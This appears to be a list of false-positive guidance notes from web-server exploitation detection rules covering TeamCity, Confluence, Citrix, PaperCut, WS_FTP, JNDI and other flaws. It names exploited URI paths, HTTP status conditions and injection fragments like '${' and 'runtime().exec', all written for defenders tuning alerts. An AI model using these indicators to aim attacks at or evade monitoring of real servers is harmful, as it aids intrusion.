LoFP LoFP / web server

TitleTags
be aware of potential false positives - legitimate uses of the /webauth_operation.php endpoint may cause benign activities to be flagged.the url in the analytic is specific to a successful attempt to exploit the vulnerability. review contents of the http body to determine if the request is malicious. if the request is benign, add the url to the whitelist or continue to monitor.
false positives are limited to zscalar configuration.
false positives are limited to zscaler configuration.
false positives are limited.
false positives are not expected, as the detection is based on the presence of web requests to the setupwizard.aspx page, which is not a common page to be accessed by legitimate users. note that the analytic is limited to http post and a status of 200 to reduce false positives. modify the query as needed to reduce false positives or hunt for additional indicators of compromise.
false positives are not expected, as this detection is based on monitoring http post requests to a specific endpoint with a status code of 200. however, ensure that legitimate requests to the `/wsstatusevents/eventhandler.asmx` endpoint are accounted for in the environment to avoid false positives.
false positives are not expected, as this detection is based on the presence of specific uri paths and http methods that are indicative of the cve-2024-27198 vulnerability exploitation. monitor, filter and tune as needed based on organization log sources.
false positives are not expected, however, monitor, filter, and tune as needed based on organization log sources. the analytic is restricted to 200 and get requests to specific uri paths, which should limit false positives.
false positives are present when the values are set to 1 for utf and lookup. it's possible to raise this to ttp (direct notable) if removal of other_lookups occur and score is raised to 2 (down from 4).
false positives may be possible, however we restricted it to http status 200 and post requests, based on the poc. upon investigation review the post body for the actual payload - or command - being executed.
false positives may be present based on organization use of citrix adc and gateway. filter, or restrict the analytic to citrix devices only.
false positives may be present if the activity is blocked or was not successful. filter known vulnerablity scanners. filter as needed.
false positives may be present with legitimate applications. attempt to filter by dest ip or use asset groups to restrict to confluence servers.
false positives may be present, as this is based on the admin user accessing the papercut ng instance from a public ip address. filter as needed.
false positives may be present, filter as needed.
false positives may occur and filtering may be required. restrict analytic to asset type.
false positives may occur depending on the web server's configuration. if the web server is intentionally configured to utilize the remote shellservlet, then the detections by this analytic would not be considered true positives.
false positives may occur if legitimate pswa processes are used for administrative tasks. careful review of the logs is recommended to distinguish between legitimate and malicious activity.
false positives may occur if there are legitimate activities that mimic the exploitation pattern. it's recommended to review the context of the alerts and adjust the analytic parameters to better fit the specific environment.
false positives may occur, therefore utilize the analytic as a jump off point to identifiy potential certificate store errors.
false positives should be limited as this detection is based on a specific url path and http status code. adjust the search as necessary to fit the environment.
false positives will be limited, however tune or modify the query as needed.
false positives will be present based on gateways in use, modify the status field as needed.
filtering may be required in some instances, filter as needed.
if teamcity is not in use, this analytic will not return results. monitor and tune for your environment.
if ws_ftp server is not in use, this analytic will not return results. monitor and tune for your environment. note the metasploit module is focused on only hitting /aht/ and not the full /aht/ahtapiservice.asmx/authuser url.
it is highly possible you will find false positives, however, the base score is set to 2 for _any_ jndi found in raw logs. tune and change as needed, include any filtering.
it's possible for legitimate http requests to be made to urls containing the suspicious paths.
no known false positives for this detection.
similar to cve-2023-35078, the path for exploitation indicates that status=200 is required for successful exploitation of the vulnerability. false positives may be present if status=200 is removed from the search. if it is removed,then the search also alert on status=301 and status=404 which indicates unsuccessful exploitation attempts. analysts may find it useful to hunt for these status codes as well, but it is likely to produce a significant number of alerts as this is a widespread vulnerability.
some of these processes may be used legitimately on web servers during maintenance or other administrative tasks.
the jsp file names are static names used in current proof of concept code. =
the proof of concept exploit script indicates that status=200 is required for successful exploitation of the vulnerability. false positives may be present if status=200 is removed from the search. if it is removed,then the search also alert on status=301 and status=404 which indicates unsuccessful exploitation attempts. analysts may find it useful to hunt for these status codes as well, but it is likely to produce a significant number of alerts as this is a widespread vulnerability.
there might be false positives associted with this detection since items like args as a web argument is pretty generic.
tune based on assets if possible, or restrict to known confluence servers. remove the ${ for a more broad query. to identify more exec, remove everything up to the last parameter (runtime().exec) for a broad query.
very few legitimate content-type fields will have a length greater than 100 characters.